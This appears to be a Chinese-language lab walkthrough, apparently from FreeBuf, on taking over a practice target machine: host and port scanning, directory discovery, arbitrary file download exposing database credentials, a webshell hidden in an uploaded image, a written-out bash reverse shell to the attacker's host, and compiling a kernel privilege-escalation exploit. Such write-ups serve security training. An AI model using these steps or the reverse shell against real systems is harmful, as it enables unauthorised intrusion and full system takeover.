Shorge
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
信息收集
1.扫描主机
arp-scan-l (-l从网络接口配置生成地址)
可以根据靶机的mac地址来确定具体的ip为192.168.23.4
2.扫描开放端口
nmap -PR 192.168.23.4
开放了80和22端口。说明可以远程连接,也有web服务
3.扫描目录
dirsearch -u 192.168.23.4
方式一
根据上步发现的22端口,拿到账号密码就可以登陆。
扫描目录出来phpmy,一般数据库默认文件会放在config.inc.php,对此可以进行路径的组合。
通过对发现的目录进行打开测试。在test下可以进行路径参数传递。
进行传参,同时要改为post传参
获得密码后登陆即可
方式二
1.获取数据库账号密码
还是在test页面看是否能下载文件
可以下载下来,同时可以任意下载,将目录中的文件下来出来后发现只有c.php存在账户密码
登陆phpmy可以得到前台的登陆密码
成功的登陆进去网站
2.漏洞利用点
发现可以上传的功能点
根据text下,下载出来网页的源码可以发现限制了文件的后缀名。
传入图片并加入木马
continue这里可以执行文件,需要在post后加入相应指令
进行反弹shell
需要改为url编码
echo "bash -i >& /dev/tcp/192.168.23.2/6666 0>&1" | bash
之后在kali中进行监听。
提权
用python建立交互:python -c 'import pty;pty.spawn("/bin/bash")'
查看内核和版本号:uname -a cat /etc/issue
在kali下查询对应版本的exp
将其下载下来,并执行
gcc -pthread 37292.c -o 37292 -lcrypt
./37292
拿下权限
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)